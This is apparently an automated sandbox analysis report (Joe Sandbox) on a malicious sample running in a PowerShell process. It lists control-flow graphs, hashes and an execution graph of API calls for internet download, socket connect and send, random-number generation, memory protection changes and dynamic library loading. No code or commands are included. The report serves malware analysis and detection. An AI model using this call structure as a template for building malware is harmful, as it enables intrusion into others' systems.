                                                                                                                                                                          control_flow_graph 1030 4526e8-452717 1031 45272f-452782 1030->1031 1032 452719-45271f 1030->1032 1039 452784-4527a3 1031->1039 1040 4527ab-4527b2 1031->1040 1033 452721 1032->1033 1034 452723-45272d 1032->1034 1033->1031 1034->1031 1039->1040 1041 4527b8-4527bd 1040->1041 1042 45285b-452888 1040->1042 1044 4527d5-4527e1 1041->1044 1045 4527bf-4527c5 1041->1045 1062 45288d-4528a1 1042->1062 1044->1042 1049 4527e3-4527fe 1044->1049 1047 4527c7 1045->1047 1048 4527c9-4527d3 1045->1048 1047->1044 1048->1044 1053 452800-452806 1049->1053 1054 452818-45281c 1049->1054 1055 452808 1053->1055 1056 45280a-452816 1053->1056 1058 452823-452859 1054->1058 1055->1054 1056->1054 1058->1062 1063 4528a3-4528c2 1062->1063 1064 4528ca-452902 1062->1064 1063->1064 1070 452903 1064->1070 1070->1070
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ce3a7d55a4c54a2ca4c0804b6b1c5e9d70f7996aad5b12138dfb5d3046a326f5
                                                                                                                                                                          • Instruction ID: 1802b21762b18538cf06f2bb93ce3e43a21850ab6de030df5af817b862fe58b9
                                                                                                                                                                          • Opcode Fuzzy Hash: ce3a7d55a4c54a2ca4c0804b6b1c5e9d70f7996aad5b12138dfb5d3046a326f5
                                                                                                                                                                          • Instruction Fuzzy Hash: FC517334B00208CFDB14DF94C280AAAB7F2EF89711F14856AD8056B356C7759D82DB61

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1071 4526cd-452717 1073 45272f-452782 1071->1073 1074 452719-45271f 1071->1074 1081 452784-4527a3 1073->1081 1082 4527ab-4527b2 1073->1082 1075 452721 1074->1075 1076 452723-45272d 1074->1076 1075->1073 1076->1073 1081->1082 1083 4527b8-4527bd 1082->1083 1084 45285b-452888 1082->1084 1086 4527d5-4527e1 1083->1086 1087 4527bf-4527c5 1083->1087 1104 45288d-4528a1 1084->1104 1086->1084 1091 4527e3-4527fe 1086->1091 1089 4527c7 1087->1089 1090 4527c9-4527d3 1087->1090 1089->1086 1090->1086 1095 452800-452806 1091->1095 1096 452818-45281c 1091->1096 1097 452808 1095->1097 1098 45280a-452816 1095->1098 1100 452823-452859 1096->1100 1097->1096 1098->1096 1100->1104 1105 4528a3-4528c2 1104->1105 1106 4528ca-452902 1104->1106 1105->1106 1112 452903 1106->1112 1112->1112
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 44ee32bf72a264786dd91ce525e69028c1e12e68d2571bfa43e2359e53e22de3
                                                                                                                                                                          • Instruction ID: b4467c8efff1e58dc883c54ee27af72e9f28cc13d2912b25fa8f391649047287
                                                                                                                                                                          • Opcode Fuzzy Hash: 44ee32bf72a264786dd91ce525e69028c1e12e68d2571bfa43e2359e53e22de3
                                                                                                                                                                          • Instruction Fuzzy Hash: BA51A434A00204CFD710CF54C240BAAB7F2EF8A711F1486ABD805AB362C775EC86DB61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 570ee4c122fce59517575513f146e0764a6866f9bf8643951e26c9ccff44fd5b
                                                                                                                                                                          • Instruction ID: ef18457cdd9e2254b868259c259d0ad8e1e603869a442db46100a02391e8df8f
                                                                                                                                                                          • Opcode Fuzzy Hash: 570ee4c122fce59517575513f146e0764a6866f9bf8643951e26c9ccff44fd5b
                                                                                                                                                                          • Instruction Fuzzy Hash: B641D635609381CFC7228B10C85166ABFB1AF86701F1984DBE8549F293C775DD49C7A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 034b0f8121dc6459fcfb5c7dfb29187e1958b199a4903cd3448755058a30965c
                                                                                                                                                                          • Instruction ID: 3f6d8e8208817e0d2e736508130cd6e82cf59461f4bdb551ea5ee536cfc16c34
                                                                                                                                                                          • Opcode Fuzzy Hash: 034b0f8121dc6459fcfb5c7dfb29187e1958b199a4903cd3448755058a30965c
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A318C30A00208DFDB25CF55C844B6ABBA1BB41393F14806BED048B292C778DE99CB5A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ab82b28d70a967d61a85cb3c8253a531ac2717922364a9fce2eafe28182dacde
                                                                                                                                                                          • Instruction ID: 4cf5c04a38d19d79d013be4ad0823823c164530b41b84c38a64104515727239e
                                                                                                                                                                          • Opcode Fuzzy Hash: ab82b28d70a967d61a85cb3c8253a531ac2717922364a9fce2eafe28182dacde
                                                                                                                                                                          • Instruction Fuzzy Hash: AB219030A00305CFCB24DE29C59076BB7E1AB55793F14C067E8048739AD778DE8ACB56
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514671783.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1ad000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d6a6975ddfa752165c7e9b02a33e772e055e7a37bb8099289364089120a02a88
                                                                                                                                                                          • Instruction ID: a9ab074a950fb53a62bb499f02027ac9ddab73f185b6eb5e6af2719596d30be2
                                                                                                                                                                          • Opcode Fuzzy Hash: d6a6975ddfa752165c7e9b02a33e772e055e7a37bb8099289364089120a02a88
                                                                                                                                                                          • Instruction Fuzzy Hash: E2019E6100D3C09FD7134B259D98762BFB8EF53624F1984CBE8898F1A3C2695C45CB72
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bd8dd54a52014fbaa79a56b1ce558f3118595a32da25c44038d759c1dccefc7e
                                                                                                                                                                          • Instruction ID: cd79f7c4e53849b676a98a00a324bbb099dbb8edc09e031bb585d705c642a753
                                                                                                                                                                          • Opcode Fuzzy Hash: bd8dd54a52014fbaa79a56b1ce558f3118595a32da25c44038d759c1dccefc7e
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C01974950E3C85FD7434BB058245A97F319E93600B0A82EBD4C58F2E3D6288A0DCB27
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514671783.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1ad000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: af131c95d528d63986e80ea2491b5fd4754ab5b3cd7337f356b5349ea6578dac
                                                                                                                                                                          • Instruction ID: dac784ca5d41bd14844efd63be54335a98a5c03cfaaec0177f79d784b65ee221
                                                                                                                                                                          • Opcode Fuzzy Hash: af131c95d528d63986e80ea2491b5fd4754ab5b3cd7337f356b5349ea6578dac
                                                                                                                                                                          • Instruction Fuzzy Hash: F501F775104B40AAE7115F25D9C4767FBD8DF82764F18C019FC4A0B582C3799941CAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3690ae49c7f4fcf7e0fbc9e717bddd5d231b9b98409011d6a473e708094b72b2
                                                                                                                                                                          • Instruction ID: 2030ecc9a7d835f00df6ebde09e8ee07d757b9a99d5ce37f6c4e8e481a10acbd
                                                                                                                                                                          • Opcode Fuzzy Hash: 3690ae49c7f4fcf7e0fbc9e717bddd5d231b9b98409011d6a473e708094b72b2
                                                                                                                                                                          • Instruction Fuzzy Hash: DBF1759692F7C25FE303673948B51DA3FB1AE6329075E10E7C491CF1A3D609486EC3A6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (Fa$D<=$D<=$D<=$L4#p$L4#p$L4#p$h<=
                                                                                                                                                                          • API String ID: 0-102881801
                                                                                                                                                                          • Opcode ID: 6e7cfdefabb23fd3101677ffa8480742040ee48b73d35b88cb7db4dc411777bb
                                                                                                                                                                          • Instruction ID: 76a1ae27b82d9fc60468c518a691782bb6506f2f56edc662a3137e673a684557
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e7cfdefabb23fd3101677ffa8480742040ee48b73d35b88cb7db4dc411777bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 78613531700258AFDF169B64C8507BE7BA2AF81301F148067ED059B3A3DB79DE49C7A6

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:5.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:20.1%
                                                                                                                                                                          Signature Coverage:3.4%
                                                                                                                                                                          Total number of Nodes:1514
                                                                                                                                                                          Total number of Limit Nodes:32
                                                                                                                                                                          execution_graph 53043 415d41 53058 41b411 53043->53058 53045 415d4a 53069 4020f6 53045->53069 53050 4170c4 53093 401e8d 53050->53093 53054 401fd8 11 API calls 53055 4170d9 53054->53055 53056 401fd8 11 API calls 53055->53056 53057 4170e5 53056->53057 53099 4020df 53058->53099 53063 41b456 InternetReadFile 53067 41b479 53063->53067 53064 41b4a6 InternetCloseHandle InternetCloseHandle 53066 41b4b8 53064->53066 53066->53045 53067->53063 53067->53064 53068 401fd8 11 API calls 53067->53068 53110 4020b7 53067->53110 53068->53067 53070 40210c 53069->53070 53071 4023ce 11 API calls 53070->53071 53072 402126 53071->53072 53073 402569 28 API calls 53072->53073 53074 402134 53073->53074 53075 404aa1 53074->53075 53076 404ab4 53075->53076 53177 40520c 53076->53177 53078 404ac9 ctype 53079 404b40 WaitForSingleObject 53078->53079 53080 404b20 53078->53080 53082 404b56 53079->53082 53081 404b32 send 53080->53081 53083 404b7b 53081->53083 53183 4210cb 54 API calls 53082->53183 53085 401fd8 11 API calls 53083->53085 53087 404b83 53085->53087 53086 404b69 SetEvent 53086->53083 53088 401fd8 11 API calls 53087->53088 53089 404b8b 53088->53089 53089->53050 53090 401fd8 53089->53090 53091 4023ce 11 API calls 53090->53091 53092 401fe1 53091->53092 53092->53050 53094 402163 53093->53094 53095 40219f 53094->53095 53201 402730 11 API calls 53094->53201 53095->53054 53097 402184 53202 402712 11 API calls std::_Deallocate 53097->53202 53100 4020e7 53099->53100 53116 4023ce 53100->53116 53102 4020f2 53103 43bda0 53102->53103 53108 4461b8 __Getctype 53103->53108 53104 4461f6 53132 44062d 20 API calls __dosmaperr 53104->53132 53105 4461e1 RtlAllocateHeap 53107 41b42f InternetOpenW InternetOpenUrlW 53105->53107 53105->53108 53107->53063 53108->53104 53108->53105 53131 443001 7 API calls 2 library calls 53108->53131 53111 4020bf 53110->53111 53112 4023ce 11 API calls 53111->53112 53113 4020ca 53112->53113 53133 40250a 53113->53133 53115 4020d9 53115->53067 53117 402428 53116->53117 53118 4023d8 53116->53118 53117->53102 53118->53117 53120 4027a7 53118->53120 53121 402e21 53120->53121 53124 4016b4 53121->53124 53123 402e30 53123->53117 53125 4016cb 53124->53125 53126 4016c6 53124->53126 53125->53126 53127 4016f3 53125->53127 53130 43bd68 11 API calls _Atexit 53126->53130 53127->53123 53129 43bd67 53130->53129 53131->53108 53132->53107 53134 40251a 53133->53134 53135 402520 53134->53135 53136 402535 53134->53136 53140 402569 53135->53140 53150 4028e8 53136->53150 53139 402533 53139->53115 53161 402888 53140->53161 53142 40257d 53143 402592 53142->53143 53144 4025a7 53142->53144 53166 402a34 22 API calls 53143->53166 53146 4028e8 28 API calls 53144->53146 53149 4025a5 53146->53149 53147 40259b 53167 4029da 22 API calls 53147->53167 53149->53139 53151 4028f1 53150->53151 53152 402953 53151->53152 53153 4028fb 53151->53153 53175 4028a4 22 API calls 53152->53175 53156 402904 53153->53156 53158 402917 53153->53158 53169 402cae 53156->53169 53157 402915 53157->53139 53158->53157 53160 4023ce 11 API calls 53158->53160 53160->53157 53162 402890 53161->53162 53163 402898 53162->53163 53168 402ca3 22 API calls 53162->53168 53163->53142 53166->53147 53167->53149 53170 402cb8 __EH_prolog 53169->53170 53176 402e54 22 API calls 53170->53176 53172 4023ce 11 API calls 53174 402d92 53172->53174 53173 402d24 53173->53172 53174->53157 53176->53173 53178 405214 53177->53178 53179 4023ce 11 API calls 53178->53179 53180 40521f 53179->53180 53184 405234 53180->53184 53182 40522e 53182->53078 53183->53086 53185 405240 53184->53185 53186 40526e 53184->53186 53187 4028e8 28 API calls 53185->53187 53200 4028a4 22 API calls 53186->53200 53190 40524a 53187->53190 53190->53182 53201->53097 53202->53095 53203 10006d60 53204 10006d69 53203->53204 53205 10006d72 53203->53205 53207 10006c5f 53204->53207 53227 10005af6 GetLastError 53207->53227 53209 10006c6c 53247 10006d7e 53209->53247 53211 10006c74 53256 100069f3 53211->53256 53214 10006c8b 53214->53205 53220 10006ce6 53224 10006d12 53220->53224 53282 1000571e 20 API calls __dosmaperr 53220->53282 53221 10006cc9 53280 10006368 20 API calls _abort 53221->53280 53223 10006cce 53281 1000571e 20 API calls __dosmaperr 53223->53281 53224->53223 53283 100068c9 26 API calls 53224->53283 53228 10005b12 53227->53228 53229 10005b0c 53227->53229 53233 10005b61 SetLastError 53228->53233 53285 1000637b 20 API calls 2 library calls 53228->53285 53284 10005e08 11 API calls 2 library calls 53229->53284 53232 10005b24 53234 10005b2c 53232->53234 53287 10005e5e 11 API calls 2 library calls 53232->53287 53233->53209 53286 1000571e 20 API calls __dosmaperr 53234->53286 53237 10005b41 53237->53234 53238 10005b48 53237->53238 53288 1000593c 20 API calls _abort 53238->53288 53239 10005b32 53241 10005b6d SetLastError 53239->53241 53290 100055a8 38 API calls _abort 53241->53290 53242 10005b53 53289 1000571e 20 API calls __dosmaperr 53242->53289 53246 10005b5a 53246->53233 53246->53241 53248 10006d8a ___DestructExceptionObject 53247->53248 53249 10005af6 _abort 38 API calls 53248->53249 53254 10006d94 53249->53254 53251 10006e18 _abort 53251->53211 53254->53251 53291 100055a8 38 API calls _abort 53254->53291 53292 10005671 RtlEnterCriticalSection 53254->53292 53293 1000571e 20 API calls __dosmaperr 53254->53293 53294 10006e0f RtlLeaveCriticalSection _abort 53254->53294 53295 100054a7 53256->53295 53259 10006a14 GetOEMCP 53261 10006a3d 53259->53261 53260 10006a26 53260->53261 53262 10006a2b GetACP 53260->53262 53261->53214 53263 100056d0 53261->53263 53262->53261 53264 1000570e 53263->53264 53268 100056de _abort 53263->53268 53306 10006368 20 API calls _abort 53264->53306 53265 100056f9 RtlAllocateHeap 53267 1000570c 53265->53267 53265->53268 53267->53223 53270 10006e20 53267->53270 53268->53264 53268->53265 53305 1000474f 7 API calls 2 library calls 53268->53305 53271 100069f3 40 API calls 53270->53271 53272 10006e3f 53271->53272 53275 10006e90 IsValidCodePage 53272->53275 53277 10006e46 53272->53277 53278 10006eb5 ___scrt_fastfail 53272->53278 53274 10006cc1 53274->53220 53274->53221 53276 10006ea2 GetCPInfo 53275->53276 53275->53277 53276->53277 53276->53278 53317 10002ada 53277->53317 53307 10006acb GetCPInfo 53278->53307 53280->53223 53281->53214 53282->53224 53283->53223 53284->53228 53285->53232 53286->53239 53287->53237 53288->53242 53289->53246 53292->53254 53293->53254 53294->53254 53296 100054c4 53295->53296 53302 100054ba 53295->53302 53297 10005af6 _abort 38 API calls 53296->53297 53296->53302 53298 100054e5 53297->53298 53303 10007a00 38 API calls __fassign 53298->53303 53300 100054fe 53304 10007a2d 38 API calls __fassign 53300->53304 53302->53259 53302->53260 53303->53300 53304->53302 53305->53268 53306->53267 53308 10006baf 53307->53308 53314 10006b05 53307->53314 53311 10002ada _ValidateLocalCookies 5 API calls 53308->53311 53313 10006c5b 53311->53313 53313->53277 53324 100086e4 53314->53324 53316 10008a3e 43 API calls 53316->53308 53318 10002ae3 53317->53318 53319 10002ae5 IsProcessorFeaturePresent 53317->53319 53318->53274 53321 10002b58 53319->53321 53397 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53321->53397 53323 10002c3b 53323->53274 53325 100054a7 __fassign 38 API calls 53324->53325 53326 10008704 MultiByteToWideChar 53325->53326 53328 10008742 53326->53328 53329 100087da 53326->53329 53333 100056d0 21 API calls 53328->53333 53334 10008763 ___scrt_fastfail 53328->53334 53330 10002ada _ValidateLocalCookies 5 API calls 53329->53330 53331 10006b66 53330->53331 53338 10008a3e 53331->53338 53332 100087d4 53343 10008801 20 API calls _free 53332->53343 53333->53334 53334->53332 53336 100087a8 MultiByteToWideChar 53334->53336 53336->53332 53337 100087c4 GetStringTypeW 53336->53337 53337->53332 53339 100054a7 __fassign 38 API calls 53338->53339 53340 10008a51 53339->53340 53344 10008821 53340->53344 53343->53329 53345 1000883c 53344->53345 53346 10008862 MultiByteToWideChar 53345->53346 53347 10008a16 53346->53347 53348 1000888c 53346->53348 53349 10002ada _ValidateLocalCookies 5 API calls 53347->53349 53351 100056d0 21 API calls 53348->53351 53354 100088ad 53348->53354 53350 10006b87 53349->53350 53350->53316 53351->53354 53352 100088f6 MultiByteToWideChar 53353 10008962 53352->53353 53355 1000890f 53352->53355 53380 10008801 20 API calls _free 53353->53380 53354->53352 53354->53353 53371 10005f19 53355->53371 53359 10008971 53363 100056d0 21 API calls 53359->53363 53364 10008992 53359->53364 53360 10008939 53360->53353 53361 10005f19 11 API calls 53360->53361 53361->53353 53362 10008a07 53379 10008801 20 API calls _free 53362->53379 53363->53364 53364->53362 53365 10005f19 11 API calls 53364->53365 53367 100089e6 53365->53367 53367->53362 53368 100089f5 WideCharToMultiByte 53367->53368 53368->53362 53369 10008a35 53368->53369 53381 10008801 20 API calls _free 53369->53381 53382 10005c45 53371->53382 53374 10005f49 53377 10002ada _ValidateLocalCookies 5 API calls 53374->53377 53376 10005f89 LCMapStringW 53376->53374 53378 10005f9b 53377->53378 53378->53353 53378->53359 53378->53360 53379->53353 53380->53347 53381->53353 53383 10005c75 53382->53383 53384 10005c71 53382->53384 53383->53374 53389 10005fa1 10 API calls 2 library calls 53383->53389 53384->53383 53385 10005c95 53384->53385 53390 10005ce1 53384->53390 53385->53383 53387 10005ca1 GetProcAddress 53385->53387 53388 10005cb1 __crt_fast_encode_pointer 53387->53388 53388->53383 53389->53376 53391 10005d02 LoadLibraryExW 53390->53391 53396 10005cf7 53390->53396 53392 10005d1f GetLastError 53391->53392 53395 10005d37 53391->53395 53393 10005d2a LoadLibraryExW 53392->53393 53392->53395 53393->53395 53394 10005d4e FreeLibrary 53394->53396 53395->53394 53395->53396 53396->53384 53397->53323 53398 434906 53403 434bd8 SetUnhandledExceptionFilter 53398->53403 53400 43490b pre_c_initialization 53404 4455cc 20 API calls 2 library calls 53400->53404 53402 434916 53403->53400 53404->53402 53405 1000c7a7 53406 1000c7be 53405->53406 53411 1000c82c 53405->53411 53406->53411 53417 1000c7e6 GetModuleHandleA 53406->53417 53407 1000c872 53408 1000c835 GetModuleHandleA 53412 1000c83f 53408->53412 53411->53407 53411->53408 53411->53412 53412->53411 53413 1000c85f GetProcAddress 53412->53413 53413->53411 53418 1000c7ef 53417->53418 53424 1000c82c 53417->53424 53429 1000c803 GetProcAddress 53418->53429 53420 1000c872 53421 1000c835 GetModuleHandleA 53427 1000c83f 53421->53427 53424->53420 53424->53421 53424->53427 53427->53424 53428 1000c85f GetProcAddress 53427->53428 53428->53424 53430 1000c82c 53429->53430 53431 1000c80d VirtualProtect 53429->53431 53433 1000c872 53430->53433 53434 1000c835 GetModuleHandleA 53430->53434 53431->53430 53432 1000c81c VirtualProtect 53431->53432 53432->53430 53436 1000c83f 53434->53436 53435 1000c85f GetProcAddress 53435->53436 53436->53430 53436->53435 53437 41e04e 53438 41e063 ctype ___scrt_fastfail 53437->53438 53439 41e266 53438->53439 53440 432f55 21 API calls 53438->53440 53445 41e21a 53439->53445 53451 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53439->53451 53444 41e213 ___scrt_fastfail 53440->53444 53442 41e277 53442->53445 53452 432f55 53442->53452 53444->53445 53446 432f55 21 API calls 53444->53446 53449 41e240 ___scrt_fastfail 53446->53449 53447 41e2b0 ___scrt_fastfail 53447->53445 53457 4335db 53447->53457 53449->53445 53450 432f55 21 API calls 53449->53450 53450->53439 53451->53442 53453 432f63 53452->53453 53454 432f5f 53452->53454 53455 43bda0 ___std_exception_copy 21 API calls 53453->53455 53454->53447 53456 432f68 53455->53456 53456->53447 53460 4334fa 53457->53460 53459 4335e3 53459->53445 53461 433513 53460->53461 53465 433509 53460->53465 53462 432f55 21 API calls 53461->53462 53461->53465 53463 433534 53462->53463 53463->53465 53466 4338c8 CryptAcquireContextA 53463->53466 53465->53459 53467 4338e4 53466->53467 53468 4338e9 CryptGenRandom 53466->53468 53467->53465 53468->53467 53469 4338fe CryptReleaseContext 53468->53469 53469->53467 53470 426c6d 53476 426d42 recv 53470->53476 53477 426a77 53478 426a8c 53477->53478 53490 426b1e 53477->53490 53479 426b83 53478->53479 53480 426bae 53478->53480 53483 426b0e 53478->53483 53487 426b4e 53478->53487 53489 426ad9 53478->53489 53478->53490 53491 426bd5 53478->53491 53505 424f6e 49 API calls ctype 53478->53505 53479->53480 53509 425781 21 API calls 53479->53509 53480->53490 53480->53491 53493 425b72 53480->53493 53483->53487 53483->53490 53507 424f6e 49 API calls ctype 53483->53507 53487->53479 53487->53490 53508 41fbfd 52 API calls 53487->53508 53489->53483 53489->53490 53506 41fbfd 52 API calls 53489->53506 53491->53490 53510 4261e6 28 API calls 53491->53510 53494 425b91 ___scrt_fastfail 53493->53494 53496 425ba0 53494->53496 53500 425bc5 53494->53500 53511 41ec4c 21 API calls 53494->53511 53496->53500 53504 425ba5 53496->53504 53512 420669 46 API calls 53496->53512 53499 425bae 53499->53500 53514 424d96 21 API calls 2 library calls 53499->53514 53500->53491 53502 425c48 53502->53500 53503 432f55 21 API calls 53502->53503 53503->53504 53504->53499 53504->53500 53513 41daf0 49 API calls 53504->53513 53505->53489 53506->53489 53507->53487 53508->53487 53509->53480 53510->53490 53511->53496 53512->53502 53513->53499 53514->53500 53515 4165db 53526 401e65 53515->53526 53517 4165eb 53518 4020f6 28 API calls 53517->53518 53519 4165f6 53518->53519 53520 401e65 22 API calls 53519->53520 53521 416601 53520->53521 53522 4020f6 28 API calls 53521->53522 53523 41660c 53522->53523 53531 412965 53523->53531 53527 401e6d 53526->53527 53530 401e75 53527->53530 53550 402158 22 API calls 53527->53550 53530->53517 53551 40482d 53531->53551 53533 412979 53558 4048c8 connect 53533->53558 53537 41299a 53623 402f10 53537->53623 53540 404aa1 61 API calls 53541 4129ae 53540->53541 53542 401fd8 11 API calls 53541->53542 53543 4129b6 53542->53543 53628 404c10 53543->53628 53546 401fd8 11 API calls 53547 4129cc 53546->53547 53548 401fd8 11 API calls 53547->53548 53549 4129d4 53548->53549 53552 404846 socket 53551->53552 53553 404839 53551->53553 53554 404860 CreateEventW 53552->53554 53555 404842 53552->53555 53646 40489e WSAStartup 53553->53646 53554->53533 53555->53533 53557 40483e 53557->53552 53557->53555 53559 404a1b 53558->53559 53560 4048ee 53558->53560 53561 40497e 53559->53561 53562 404a21 WSAGetLastError 53559->53562 53560->53561 53563 404923 53560->53563 53647 40531e 53560->53647 53618 402f31 53561->53618 53562->53561 53564 404a31 53562->53564 53682 420cf1 27 API calls 53563->53682 53566 404932 53564->53566 53567 404a36 53564->53567 53572 402093 28 API calls 53566->53572 53687 41cb72 30 API calls 53567->53687 53569 40490f 53652 402093 53569->53652 53571 40492b 53571->53566 53575 404941 53571->53575 53576 404a80 53572->53576 53574 404a40 53688 4052fd 28 API calls 53574->53688 53582 404950 53575->53582 53583 404987 53575->53583 53579 402093 28 API calls 53576->53579 53584 404a8f 53579->53584 53586 402093 28 API calls 53582->53586 53684 421ad1 54 API calls 53583->53684 53587 41b580 80 API calls 53584->53587 53590 40495f 53586->53590 53587->53561 53593 402093 28 API calls 53590->53593 53591 40498f 53594 4049c4 53591->53594 53595 404994 53591->53595 53597 40496e 53593->53597 53686 420e97 28 API calls 53594->53686 53599 402093 28 API calls 53595->53599 53602 41b580 80 API calls 53597->53602 53601 4049a3 53599->53601 53604 402093 28 API calls 53601->53604 53605 404973 53602->53605 53603 4049cc 53606 4049f9 CreateEventW CreateEventW 53603->53606 53608 402093 28 API calls 53603->53608 53607 4049b2 53604->53607 53683 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53605->53683 53606->53561 53609 41b580 80 API calls 53607->53609 53611 4049e2 53608->53611 53612 4049b7 53609->53612 53613 402093 28 API calls 53611->53613 53685 421143 52 API calls 53612->53685 53615 4049f1 53613->53615 53616 41b580 80 API calls 53615->53616 53617 4049f6 53616->53617 53617->53606 53619 4020df 11 API calls 53618->53619 53620 402f3d 53619->53620 53621 4032a0 28 API calls 53620->53621 53622 402f59 53621->53622 53622->53537 53739 401fb0 53623->53739 53625 402f1e 53626 402055 11 API calls 53625->53626 53627 402f2d 53626->53627 53627->53540 53629 4020df 11 API calls 53628->53629 53630 404c27 53629->53630 53631 4020df 11 API calls 53630->53631 53641 404c30 53631->53641 53632 43bda0 ___std_exception_copy 21 API calls 53632->53641 53634 4020b7 28 API calls 53634->53641 53635 404ca1 53769 404e26 WaitForSingleObject 53635->53769 53639 401fd8 11 API calls 53639->53641 53640 401fd8 11 API calls 53642 404cb1 53640->53642 53641->53632 53641->53634 53641->53635 53641->53639 53742 404b96 53641->53742 53748 401fe2 53641->53748 53757 404cc3 53641->53757 53643 401fd8 11 API calls 53642->53643 53644 404cba 53643->53644 53644->53546 53646->53557 53648 4020df 11 API calls 53647->53648 53649 40532a 53648->53649 53689 4032a0 53649->53689 53651 405346 53651->53569 53653 40209b 53652->53653 53654 4023ce 11 API calls 53653->53654 53655 4020a6 53654->53655 53693 4024ed 53655->53693 53658 41b580 53659 41b631 53658->53659 53660 41b596 GetLocalTime 53658->53660 53661 401fd8 11 API calls 53659->53661 53662 40531e 28 API calls 53660->53662 53663 41b639 53661->53663 53664 41b5d8 53662->53664 53665 401fd8 11 API calls 53663->53665 53697 406383 53664->53697 53667 41b641 53665->53667 53667->53563 53669 402f10 28 API calls 53670 41b5f0 53669->53670 53671 406383 28 API calls 53670->53671 53672 41b5fc 53671->53672 53702 40723b 77 API calls 53672->53702 53674 41b60a 53675 401fd8 11 API calls 53674->53675 53676 41b616 53675->53676 53677 401fd8 11 API calls 